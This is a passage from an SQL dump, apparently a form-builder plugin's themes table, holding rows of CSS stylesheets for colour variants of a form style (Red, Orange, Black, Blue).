!important;\nbox-shadow: 0px 0px 3px #000000 !important;\n}\nbutton.wdform_page_button\n{\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#84857D !important;\nborder: 2px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 3px #000000 !important;\ncursor:pointer !important;\n}\nspan.wdform_page_button\n{\ncolor:#84857D !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nmargin: 5px !important;\ncursor:pointer !important;\n}\n.wdform_page_navigation\n{\npadding-left: 35px !important;\nmargin-right: -16px !important;\ntext-align:center !important;\nmargin-bottom:10px !important;\n}\n.wdform_percentage_text\n{\nmargin:3px 7px 3px 3px !important;\ncolor:#ffffff !important;\nfont-weight:bold !important;\n}\n.wdform_percentage_title\n{\ncolor:#000 !important;\nfont-style:italic !important;\nmargin: 0px 0px 0px 30px !important;\n}', 0),
(29, 'Style 5 Red', 'table {\n font-size: 12px !important;\n}\n.wdform_table1 table, .wdform_table1 tr, .wdform_table1 th{\n	border:inherit !important;\n	vertical-align:middle;\n	margin:inherit !important;\n}\n.wdform_table1 table{\n	background-color:inherit;\n}\n.wdform_table2 table{\n	width:initial !important;\n	text-align:left !important;\n}\n.wdform_table2 td{\n	vertical-align:top !important;\n        text-align:left !important;\n}\n.wdform_table1 td{\n	border:inherit !important;\n	padding:inherit !important;\n	text-align:center;\n	vertical-align:middle;\n	margin:inherit !important;\n}\n.toolbar_padding hr{\n	margin-bottom:7px !important;\n	margin-top:7px !important;\n}\n.wdform_page_button{\n	max-width:inherit !important;\n}\n.wdform_table1 span{\n	vertical-align:top !important;\n}\n.label{\n	font-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\n	color:#ffffff !important;\n}\n.wdform_date{\n	width:100px !important;\n}\n.wdform_table1 input, .wdform_table1 textara{\n		color:#000;\n		-webkit-transition: all 0.0s linear;\n		line-height:1 !important;\n		font-size:inherit !important; \n		margin-top:inherit !important;\n		margin-bottom:inherit !important;\n		padding-top:0px !important;\n		padding-bottom:0px !important;\n		padding-left:inherit !important;\n		padding-right:inherit !important;\n		display: inline !important;\n}\n.wdform_table1 select{\n	margin-bottom:inherit !important;\n	margin-top:inherit !important;\n	line-height:1 !important;\n	font-size:inherit !important; \n	height:inherit !important;\n}\n.wdform_table1 button{\n	padding:inherit !important;\n	line-height:1 !important;\n	background-image:none !important;\n}\n.wdform_table1\n{\nfont-size:14px !important;\nfont-weight:normal !important;\ncolor:#000000 !important;\nborder-spacing: 0px !important;\nborder: 0px solid black !important;\nwidth:100% !important;\n}\n.wdform_tbody1\n{\nbackground-color:#ffffff !important;\nborder:0px solid black !important;\ntext-align:center !important;\nborder-radius:0px !important;\nfloat:left !important;\nwidth:100% !important;\n}\n.wdform_tr1\n{\nvertical-align:top !important;\nwidth:100% !important;\n//display: table !important;\n}\n.wdform_table2\n{\npadding-right:30px !important;\npadding-left:30px !important;\nfloat:left !important;\nborder-spacing: 6px !important;\nborder-collapse:separate !important;\nwidth: 700px !important;\n}\n.wdform_tbody2>tr\n{\n}\n.toolbar_padding\n{\nbackground-color:#FE5E5E !important;\ntext-align:left !important;\npadding:6px !important;\n}\n.wdform_table2>tbody>tr>td\n{\nbackground-color:#DB3B3B !important;\ntext-align:center;\npadding:6px !important;\nwidth:20% !important;\n}\n.wdform_tr_section_break td\n{\npadding-right:20px !important;\npadding-left:20px !important;\nbackground-color:#ffffff !important;\nwidth:100% !important;\n}\n.wdform_select\n{\nborder-radius:0px !important;\n}\n.wdform_address input\n{\nborder-radius:0px !important;\nheight:16px !important;\nfont-size:12px !important;\nborder: 2px inset !important;\n}\n.wdform_address select\n{\nborder-radius:0px !important;\nheight:19px !important;\nfont-size:12px !important;\nborder: 2px inset !important;\n}\n.wdform_input input\n{\nborder-radius:0px !important;\nborder-width: 1px !important;\npadding:0px !important;\nmargin:0px !important;\nheight:16px !important;\nborder: 2px inset !important;\n}\n.time_box\n{\nborder-width:1px !important;\nmargin: 0px !important;\npadding: 0px !important;\ntext-align:right !important;\nwidth:30px !important;\nvertical-align:middle !important;\nborder: 2px inset !important;\n}\n.mini_label\n{\nfont-size:10px !important;\nfont-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\ncolor:#000000 !important;\nfont-weight: bold !important;\n}\n.ch_rad_label\n{\ndisplay:inline !important;\nmargin-left:5px !important;\nmargin-right:15px !important;\nfloat:none !important;\n}\n.label\n{\nborder:none !important;\ncolor:#000000 !important;\nfont-weight:bolder !important;\n}\n.td_am_pm_select\n{\npadding-left:5 !important;\n}\n.am_pm_select\n{\nheight: 20px !important;\nmargin:0 !important;\npadding:0\n}\n.input_deactive\n{\ncolor:#999999 !important;\nfont-style:italic !important;\nborder: 2px inset !important;\nmargin: 0px !important;\npadding: 0px !important;\nborder-radius:0px !important;\nheight:16px;\n}\n.input_active\n{\ncolor:#000000 !important;\nfont-style:normal !important;\nmargin: 0px !important;\npadding: 0px !important;\nborder-radius:0px !important;\nheight:16px;\nborder: 2px inset !important;\n}\n.required\n{\nborder:none !important;\ncolor:blue\n}\n.captcha_img\n{\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\ncursor:pointer !important;\n}\n.captcha_refresh\n{\nwidth:30px !important;\nheight:30px !important;\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\ncursor:pointer !important;\nbackground-image: url([SITE_ROOT]/images/refresh_black.png) !important;\n}\n.captcha_input\n{\nheight:20px !important;\nborder-width:1px !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\n}\n.file_upload\n{\nborder-width:1px !important;\nmargin: 0px !important;\npadding: 0px\n}    \n.page_deactive\n{\ncolor:black !important;\nborder: 1px solid black !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nbackground-color:#DBDBDB !important;\n}\n.page_active\n{\ncolor:white !important;\nborder: 1px solid white !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nbackground-color:#E84848 !important;\nbox-shadow: 0px 0px 3px black !important;\n}\n.page_percentage_active\n{\npadding:0px !important;\nmargin:0px !important;\nborder-spacing: 0px !important;\nheight:30px !important;\nline-height:30px !important;\nbackground-color:#000 !important;\nborder-radius:30px !important;\nfont-size:15px !important;\nfloat:left !important;\ntext-align: right !important; \n}\n.page_percentage_deactive\n{\nheight:30px !important;\nline-height:30px !important;\npadding:3px !important;\nborder:1px solid black !important;\nwidth:100% !important;\nbackground-color:#FE5E5E !important;\nborder-radius:2px !important;\ntext-align: left !important; \n}\n.page_numbers\n{\nfont-size:11px !important;\n}\n.phone_area_code\n{\nwidth:50px !important;\n}\n.phone_number\n{\nwidth:100px !important;\n}\n.button_submit\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#E84848 !important;\nborder: 2px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 3px #000000 !important;\n}\n.button_reset\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#E84848 !important;\nborder: 2px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 3px #000000 !important;\n}\n.wdform_button button\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#E84848 !important;\nborder: 2px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 3px #000000 !important;\n}\nbutton.wdform_page_button\n{\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#E84848 !important;\nborder: 2px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 3px #000000 !important;\ncursor:pointer !important;\n}\nspan.wdform_page_button\n{\ncolor:#E84848 !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nmargin: 5px !important;\ncursor:pointer !important;\n}\n.wdform_page_navigation\n{\npadding-left: 35px !important;\nmargin-right: -16px !important;\ntext-align:center !important;\nmargin-bottom:10px !important;\n}\n.wdform_percentage_text\n{\nmargin:3px 7px 3px 3px !important;\ncolor:#ffffff !important;\nfont-weight:bold !important;\n}\n.wdform_percentage_title\n{\ncolor:#000 !important;\nfont-style:italic !important;\nmargin: 0px 0px 0px 30px !important;\n}', 0),
(30, 'Style 5 Orange', 'table {\n font-size: 12px !important;\n}\n.wdform_table1 table, .wdform_table1 tr, .wdform_table1 th{\n	border:inherit !important;\n	vertical-align:middle;\n	margin:inherit !important;\n}\n.wdform_table1 table{\n	background-color:inherit;\n}\n.wdform_table2 table{\n	width:initial !important;\n	text-align:left !important;\n}\n.wdform_table2 td{\n	vertical-align:top !important;\n        text-align:left !important;\n}\n.wdform_table1 td{\n	border:inherit !important;\n	padding:inherit !important;\n	text-align:center;\n	vertical-align:middle;\n	margin:inherit !important;\n}\n.toolbar_padding hr{\n	margin-bottom:7px !important;\n	margin-top:7px !important;\n}\n.wdform_page_button{\n	max-width:inherit !important;\n}\n.wdform_table1 span{\n	vertical-align:top !important;\n}\n.label{\n	font-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\n	color:#ffffff !important;\n}\n.wdform_date{\n	width:100px !important;\n}\n.wdform_table1 input, .wdform_table1 textara{\n		color:#000;\n		-webkit-transition: all 0.0s linear;\n		line-height:1 !important;\n		font-size:inherit !important; \n		margin-top:inherit !important;\n		margin-bottom:inherit !important;\n		padding-top:0px !important;\n		padding-bottom:0px !important;\n		padding-left:inherit !important;\n		padding-right:inherit !important;\n		display: inline !important;\n}\n.wdform_table1 select{\n	margin-bottom:inherit !important;\n	margin-top:inherit !important;\n	line-height:1 !important;\n	font-size:inherit !important; \n	height:inherit !important;\n}\n.wdform_table1 button{\n	padding:inherit !important;\n	line-height:1 !important;\n	background-image:none !important;\n}\n.wdform_table1\n{\nfont-size:14px !important;\nfont-weight:normal !important;\ncolor:#000000 !important;\nborder-spacing: 0px !important;\nborder: 0px solid black !important;\nwidth:100% !important;\n}\n.wdform_tbody1\n{\nbackground-color:#ffffff !important;\nborder:0px solid black !important;\ntext-align:center !important;\nborder-radius:0px !important;\nfloat:left !important;\nwidth:100% !important;\n}\n.wdform_tr1\n{\nvertical-align:top !important;\nwidth:100% !important;\n//display: table !important;\n}\n.wdform_table2\n{\npadding-right:30px  !important;\npadding-left:30px  !important;\nfloat:left !important;\nborder-spacing: 6px !important;\nborder-collapse:separate  !important;\nwidth: 700px !important;\n}\n.wdform_tbody2>tr\n{\n}\n.toolbar_padding\n{\nbackground-color:#FFC486 !important;\ntext-align:left  !important;\npadding:6px  !important;\n}\n.wdform_table2>tbody>tr>td\n{\nbackground-color:#FFA746 !important;\ntext-align:center;\npadding:6px !important;\nwidth:20% !important;\n}\n.wdform_tr_section_break td\n{\npadding-right:20px  !important;\npadding-left:20px  !important;\nbackground-color:#ffffff !important;\nwidth:100% !important;\n}\n.wdform_select\n{\nborder-radius:0px !important;\n}\n.wdform_address input\n{\nborder-radius:0px !important;\nheight:16px !important;\nfont-size:12px !important;\nborder: 2px inset !important;\n}\n.wdform_address select\n{\nborder-radius:0px !important;\nheight:19px !important;\nfont-size:12px !important;\nborder: 2px inset !important;\n}\n.wdform_input input\n{\nborder-radius:0px !important;\nborder-width: 1px !important;\npadding:0px !important;\nmargin:0px !important;\nheight:16px !important;\nborder: 2px inset !important;\n}\n.time_box\n{\nborder-width:1px !important;\nmargin: 0px !important;\npadding: 0px !important;\ntext-align:right !important;\nwidth:30px !important;\nvertical-align:middle !important;\nborder: 2px inset !important;\n}\n.mini_label\n{\nfont-size:10px !important;\nfont-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\ncolor:#000000 !important;\nfont-weight: bold !important;\n}\n.ch_rad_label\n{\ndisplay:inline !important;\nmargin-left:5px !important;\nmargin-right:15px !important;\nfloat:none !important;\n}\n.label\n{\nborder:none !important;\ncolor:#000000 !important;\nfont-weight:bolder !important;\n}\n.td_am_pm_select\n{\npadding-left:5 !important;\n}\n.am_pm_select\n{\nheight: 20px !important;\nmargin:0 !important;\npadding:0\n}\n.input_deactive\n{\ncolor:#999999 !important;\nfont-style:italic !important;\nborder: 2px inset !important;\nmargin: 0px !important;\npadding: 0px !important;\nborder-radius:0px !important;\nheight:16px;\n}\n.input_active\n{\ncolor:#000000 !important;\nfont-style:normal !important;\nmargin: 0px !important;\npadding: 0px !important;\nborder-radius:0px !important;\nheight:16px;\nborder: 2px inset !important;\n}\n.required\n{\nborder:none !important;\ncolor:blue\n}\n.captcha_img\n{\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\ncursor:pointer !important;\n}\n.captcha_refresh\n{\nwidth:30px !important;\nheight:30px !important;\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\ncursor:pointer !important;\nbackground-image: url([SITE_ROOT]/images/refresh_black.png) !important;\n}\n.captcha_input\n{\nheight:20px !important;\nborder-width:1px !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\n}\n.file_upload\n{\nborder-width:1px !important;\nmargin: 0px !important;\npadding: 0px\n}    \n.page_deactive\n{\ncolor:black !important;\nborder: 1px solid black !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nbackground-color:#DBDBDB !important;\n}\n.page_active\n{\ncolor:white !important;\nborder: 1px solid white !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nbackground-color:#FFB365 !important;\nbox-shadow: 0px 0px 3px black !important;\n}\n.page_percentage_active\n{\npadding:0px !important;\nmargin:0px !important;\nborder-spacing: 0px !important;\nheight:30px !important;\nline-height:30px !important;\nbackground-color:#000 !important;\nborder-radius:30px !important;\nfont-size:15px !important;\nfloat:left !important;\ntext-align: right  !important; \n}\n.page_percentage_deactive\n{\nheight:30px !important;\nline-height:30px !important;\npadding:3px !important;\nborder:1px solid black !important;\nwidth:100% !important;\nbackground-color:#FFC486 !important;\nborder-radius:2px !important;\ntext-align: left  !important; \n}\n.page_numbers\n{\nfont-size:11px !important;\n}\n.phone_area_code\n{\nwidth:50px !important;\n}\n.phone_number\n{\nwidth:100px !important;\n}\n.button_submit\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#FFB365 !important;\nborder: 2px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 3px #000000 !important;\n}\n.button_reset\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#FFB365 !important;\nborder: 2px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 3px #000000 !important;\n}\n.wdform_button button\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#FFB365 !important;\nborder: 2px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 3px #000000 !important;\n}\nbutton.wdform_page_button\n{\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#FFB365 !important;\nborder: 2px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 3px #000000 !important;\ncursor:pointer !important;\n}\nspan.wdform_page_button\n{\ncolor:#FFA746 !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nmargin: 5px !important;\ncursor:pointer !important;\n}\n.wdform_page_navigation\n{\nmargin-right: -53px !important;\ntext-align:center  !important;\nmargin-bottom:10px !important;\n}\n.wdform_percentage_text\n{\nmargin:3px 7px 3px 3px !important;\ncolor:#ffffff !important;\nfont-weight:bold !important;\n}\n.wdform_percentage_title\n{\ncolor:#000 !important;\nfont-style:italic !important;\nmargin: 0px 0px 0px 30px !important;\n}', 0),
(31, 'Style 5 Black', 'table {\n font-size: 12px !important;\n}\n.wdform_table1 table, .wdform_table1 tr, .wdform_table1 th{\n	border:inherit !important;\n	vertical-align:middle;\n	margin:inherit !important;\n}\n.wdform_table1 table{\n	background-color:inherit;\n}\n.wdform_table2 table{\n	width:initial !important;\n	text-align:left !important;\n}\n.wdform_table2 td{\n	vertical-align:top !important;\n        text-align:left !important;\n}\n.wdform_table1 td{\n	border:inherit !important;\n	padding:inherit !important;\n	text-align:center;\n	vertical-align:middle;\n	margin:inherit !important;\n}\n.toolbar_padding hr{\n	margin-bottom:7px !important;\n	margin-top:7px !important;\n}\n.wdform_page_button{\n	max-width:inherit !important;\n}\n.wdform_table1 span{\n	vertical-align:top !important;\n}\n.label{\n	font-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\n	color:#ffffff !important;\n}\n.wdform_date{\n	width:100px !important;\n}\n.wdform_table1 input, .wdform_table1 textara{\n		color:#000;\n		-webkit-transition: all 0.0s linear;\n		line-height:1 !important;\n		font-size:inherit !important; \n		margin-top:inherit !important;\n		margin-bottom:inherit !important;\n		padding-top:0px !important;\n		padding-bottom:0px !important;\n		padding-left:inherit !important;\n		padding-right:inherit !important;\n		display: inline !important;\n}\n.wdform_table1 select{\n	margin-bottom:inherit !important;\n	margin-top:inherit !important;\n	line-height:1 !important;\n	font-size:inherit !important; \n	height:inherit !important;\n}\n.wdform_table1 button{\n	padding:inherit !important;\n	line-height:1 !important;\n	background-image:none !important;\n}\n.wdform_table1\n{\nfont-size:14px !important;\nfont-weight:normal !important;\ncolor:#000000 !important;\nborder-spacing: 0px !important;\nborder: 0px solid black !important;\nwidth:100% !important;\n}\n.wdform_tbody1\n{\nbackground-color:#ffffff !important;\nborder:0px solid black !important;\ntext-align:center !important;\nborder-radius:0px !important;\nfloat:left !important;\nwidth:100% !important;\n}\n.wdform_tr1\n{\nvertical-align:top !important;\nwidth:100% !important;\n//display: table !important;\n}\n.wdform_table2\n{\npadding-right:30px !important;\npadding-left:30px !important;\nfloat:left !important;\nborder-spacing: 6px !important;\nborder-collapse:separate !important;\nwidth: 700px !important;\n}\n.wdform_tbody2>tr\n{\n}\n.toolbar_padding\n{\nbackground-color:#2D2C28 !important;\ntext-align:left !important;\npadding:6px !important;\n}\n.wdform_table2>tbody>tr>td\n{\nbackground-color:#000000 !important;\ntext-align:center;\npadding:6px !important;\nwidth:20% !important;\n}\n.wdform_tr_section_break td\n{\npadding-right:20px !important;\npadding-left:20px !important;\nbackground-color:#ffffff !important;\nwidth:100% !important;\n}\n.wdform_select\n{\nborder-radius:0px !important;\n}\n.wdform_address input\n{\nborder-radius:0px !important;\nheight:16px !important;\nfont-size:12px !important;\nborder: 2px inset !important;\n}\n.wdform_address select\n{\nborder-radius:0px !important;\nheight:19px !important;\nfont-size:12px !important;\nborder: 2px inset !important;\n}\n.wdform_input input\n{\nborder-radius:0px !important;\nborder-width: 1px !important;\npadding:0px !important;\nmargin:0px !important;\nheight:16px !important;\nborder: 2px inset !important;\n}\n.time_box\n{\nborder-width:1px !important;\nmargin: 0px !important;\npadding: 0px !important;\ntext-align:right !important;\nwidth:30px !important;\nvertical-align:middle !important;\nborder: 2px inset !important;\n}\n.mini_label\n{\nfont-size:10px !important;\nfont-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\ncolor:#7EF2FF !important;\nfont-weight: bold !important;\n}\n.ch_rad_label\n{\ndisplay:inline !important;\nmargin-left:5px !important;\nmargin-right:15px !important;\nfloat:none !important;\ncolor:#7EF2FF !important;\n}\n.label\n{\nborder:none !important;\ncolor:#7EF2FF !important;\nfont-weight:bolder !important;\n}\n.td_am_pm_select\n{\npadding-left:5 !important;\n}\n.am_pm_select\n{\nheight: 20px !important;\nmargin:0 !important;\npadding:0\n}\n.input_deactive\n{\ncolor:#999999 !important;\nfont-style:italic !important;\nborder: 2px inset !important;\nmargin: 0px !important;\npadding: 0px !important;\nborder-radius:0px !important;\nheight:16px;\n}\n.input_active\n{\ncolor:#000000 !important;\nfont-style:normal !important;\nmargin: 0px !important;\npadding: 0px !important;\nborder-radius:0px !important;\nheight:16px ;\nborder: 2px inset !important;\n}\n.required\n{\nborder:none !important;\ncolor:red\n}\n.captcha_img\n{\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\ncursor:pointer !important;\n}\n.captcha_refresh\n{\nwidth:30px !important;\nheight:30px !important;\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\ncursor:pointer !important;\nbackground-image: url([SITE_ROOT]/images/refresh_white.png) !important;\n}\n.captcha_input\n{\nheight:20px !important;\nborder-width:1px !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\n}\n.file_upload\n{\nborder-width:1px !important;\nmargin: 0px !important;\npadding: 0px !important;\ncolor:#7EF2FF !important;\n}    \n.page_deactive\n{\ncolor:black !important;\nborder: 1px solid black !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nbackground-color:#DBDBDB !important;\n}\n.page_active\n{\ncolor:white !important;\nborder: 1px solid white !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nbackground-color:#100F0D !important;\nbox-shadow: 0px 0px 3px black !important;\n}\n.page_percentage_active\n{\npadding:0px !important;\nmargin:0px !important;\nborder-spacing: 0px !important;\nheight:30px !important;\nline-height:30px !important;\nbackground-color:#81F2FD !important;\nborder-radius:30px !important;\nfont-size:15px !important;\nfloat:left !important;\ntext-align: right !important; \n}\n.page_percentage_deactive\n{\nheight:30px !important;\nline-height:30px !important;\npadding:3px !important;\nborder:1px solid black !important;\nwidth:100% !important;\nbackground-color:#2D2C28 !important;\nborder-radius:2px !important;\ntext-align: left !important; \n}\n.page_numbers\n{\nfont-size:11px !important;\n}\n.phone_area_code\n{\nwidth:50px !important;\n}\n.phone_number\n{\nwidth:100px !important;\n}\n.button_submit\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#100F0D !important;\nborder: 2px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 3px #000000 !important;\n}\n.button_reset\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#100F0D !important;\nborder: 2px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 3px #000000 !important;\n}\n.wdform_button button\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#100F0D !important;\nborder: 2px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 3px #000000 !important;\n}\nbutton.wdform_page_button\n{\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#100F0D !important;\nborder: 2px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 3px #000000 !important;\ncursor:pointer !important;\n}\nspan.wdform_page_button\n{\ncolor:#000 !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nmargin: 5px !important;\ncursor:pointer !important;\n}\n.wdform_page_navigation\n{\npadding-left: 35px !important;\nmargin-right: -16px !important;\ntext-align:center !important;\nmargin-bottom:10px !important;\n}\n.wdform_percentage_text\n{\nmargin:3px 7px 3px 3px !important;\ncolor:#ffffff !important;\nfont-weight:bold !important;\n}\n.wdform_percentage_title\n{\ncolor:#fff !important;\nfont-style:italic !important;\nmargin: 0px 0px 0px 30px !important;\n}', 0),
(32, 'Style 5 Blue', 'table {\n font-size: 12px !important;\n}\n.wdform_table1 table, .wdform_table1 tr, .wdform_table1 th{\n	border:inherit !important;\n	vertical-align:middle;\n	margin:inherit !important;\n}\n.wdform_table1 table{\n	background-color:inherit;\n}\n.wdform_table2 table{\n	width:initial !important;\n	text-align:left !important;\n}\n.wdform_table2 td{\n	vertical-align:top !important;\n        text-align:left !important;\n}\n.wdform_table1 td{\n	border:inherit !important;\n	padding:inherit !important;\n	text-align:center;\n	vertical-align:middle;\n	margin:inherit !important;\n}\n.toolbar_padding hr{\n	margin-bottom:7px !important;\n	margin-top:7px !important;\n}\n.wdform_page_button{\n	max-width:inherit !important;\n}\n.wdform_table1 span{\n	vertical-align:top !important;\n}\n.label{\n	font-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\n	color:#ffffff !important;\n}\n.wdform_date{\n	width:100px !important;\n}\n.wdform_table1 input, .wdform_table1 textara{\n		color:#000;\n		-webkit-transition: all 0.0s linear;\n		line-height:1 !important;\n		font-size:inherit !important; \n		margin-top:inherit !important;\n		margin-bottom:inherit !important;\n		padding-top:0px !important;\n		padding-bottom:0px !important;\n		padding-left:inherit !important;\n		padding-right:inherit !important;\n		display: inline !important;\n}\n.wdform_table1 select{\n	margin-bottom:inherit !important;\n	margin-top:inherit !important;\n	line-height:1 !important;\n	font-size:inherit !important; \n	height:inherit !important;\n}\n.wdform_table1 button{\n	padding:inherit !important;\n	line-height:1 !important;\n	background-image:none !important;\n}\n.wdform_table1\n{\nfont-size:14px !important;\nfont-weight:normal !important;\ncolor:#000000 !important;\nborder-spacing: 0px !important;\nborder: 0px solid black !important;\nwidth:100% !important;\n}\n.wdform_tbody1\n{\nbackground-color:#ffffff !important;\nborder:0px solid black !important;\ntext-align:center !important;\nborder-radius:0px !important;\nfloat:left !important;\nwidth:100% !important;\n}\n.wdform_tr1\n{\nvertical-align:top !important;\nwidth:100% !important;\n//display: table !important;\n}\n.wdform_table2\n{\npadding-right:30px !important;\npadding-left:30px !important;\nfloat:left !important;\nborder-spacing: 6px !important;\nborder-collapse:separate !important;\nwidth: 700px !important;\n}\n.wdform_tbody2>tr\n{\n}\n.toolbar_padding\n{\nbackground-color:#3DAEF2 !important;\ntext-align:left !important;\npadding:6px !important;\n}\n.wdform_table2>tbody>tr>td\n{\nbackground-color:#3D8AB8 !important;\ntext-align:center;\npadding:6px !important;\nwidth:20% !important;\n}\n.wdform_tr_section_break td\n{\npadding-right:20px !important;\npadding-left:20px !important;\nbackground-color:#ffffff !important;\nwidth:100% !important;\n}\n.wdform_select\n{\nborder-radius:0px !important;\n}\n.wdform_address input\n{\nborder-radius:0px !important;\nheight:16px !important;\nfont-size:12px !important;\nborder: 2px inset !important;\n}\n.wdform_address select\n{\nborder-radius:0px !important;\nheight:19px !important;\nfont-size:12px !important;\nborder: 2px inset !important;\n}\n.wdform_input input\n{\nborder-radius:0px !important;\nborder-width: 1px !important;\npadding:0px !important;\nmargin:0px !important;\nheight:16px !important;\nborder: 2px inset !important;\n}\n.time_box\n{\nborder-width:1px !important;\nmargin: 0px !important;\npadding: 0px !important;\ntext-align:right !important;\nwidth:30px !important;\nvertical-align:middle !important;\nborder: 2px inset !important;\n}\n.mini_label\n{\nfont-size:10px !important;\nfont-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\ncolor:#fff !important;\nfont-weight: bold !important;\n}\n.ch_rad_label\n{\ndisplay:inline !important;\nmargin-left:5px !important;\nmargin-right:15px !important;\nfloat:none !important;\ncolor:#fff !important;\n}\n.label\n{\nborder:none !important;\ncolor:#fff !important;\nfont-weight:bolder !important;\n}\n.td_am_pm_select\n{\npadding-left:5 !important;\n}\n.am_pm_select\n{\nheight: 20px !important;\nmargin:0 !important;\npadding:0\n}\n.input_deactive\n{\ncolor:#999999 !important;\nfont-style:italic !important;\nborder: 2px inset !important;\nmargin: 0px !important;\npadding: 0px !important;\nborder-radius:0px !important;\nheight:16px ;\n}\n.input_active\n{\ncolor:#000000 !important;\nfont-style:normal !important;\nmargin: 0px !important;\npadding: 0px !important;\nborder-radius:0px !important;\nheight:16px;\nborder: 2px inset !important;\n}\n.required\n{\nborder:none !important;\ncolor:red\n}\n.captcha_img\n{\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\ncursor:pointer !important;\n}\n.captcha_refresh\n{\nwidth:30px !important;\nheight:30px !important;\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\ncursor:pointer !important;\nbackground-image: url([SITE_ROOT]/images/refresh_white.png) !important;\n}\n.captcha_input\n{\nheight:20px !important;\nborder-width:1px !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\n}\n.file_upload\n{\nborder-width:1px !important;\nmargin: 0px !important;\npadding: 0px !important;\ncolor:#fff !important;\n}    \n.page_deactive\n{\ncolor:black !important;\nborder: 1px solid black !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nbackground-color:#DBDBDB !important;\n}\n.page_active\n{\ncolor:white !important;\nborder: 1px solid white 